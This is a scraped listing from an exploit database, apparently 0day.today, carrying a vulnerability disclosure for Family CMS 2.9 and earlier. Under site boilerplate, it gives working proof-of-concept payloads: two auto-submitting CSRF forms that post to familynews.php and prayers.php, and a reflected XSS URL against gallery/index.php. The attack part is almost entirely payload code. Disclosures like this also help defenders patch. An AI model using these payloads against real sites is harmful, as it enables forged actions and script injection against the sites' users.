0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Family CMS 2.9 and earlier multiple Vulnerabilities
Family CMS 2.9 and earlier multiple Vulnerabilities =================================================================================== # Exploit Title: Family CMS 2.9 and earlier multiple Vulnerabilities # Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 2.9 # Category: webapps # Tested on: ubuntu 11.4 =================================================================================== Tips: *****First we must install all optional sections during installation process.***** 1- CSRF Vulnerabilities : POC 1: Page "familynews.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <body onLoad="autosubmit()"> <form method="POST" action="http://[localhost]/FCMS_2.9/familynews.php" id="ChangeSubmit"> <input type="hidden" name="title" value="test" /> <input type="hidden" name="submitadd" value="Add" /> <input type="hidden" name="post" value="testcsrf" /> <input type="submit" value="submit"/> </form> </body> </html> -------------------------------------------------------------------------------------------------------- POC 2:Page "prayers.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <body onLoad="autosubmit()"> <form method="POST" action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit"> <input type="hidden" name="for" value="test" /> <input type="hidden" name="submitadd" value="Add" /> <input type="hidden" name="desc" value="testtest" /> <input type="submit" value="submit"/> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------------- 2-Reflected XSS POC : http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E ----------------------------------------------------------------------------------------------------------------------------- # 0day.today [2024-11-15] #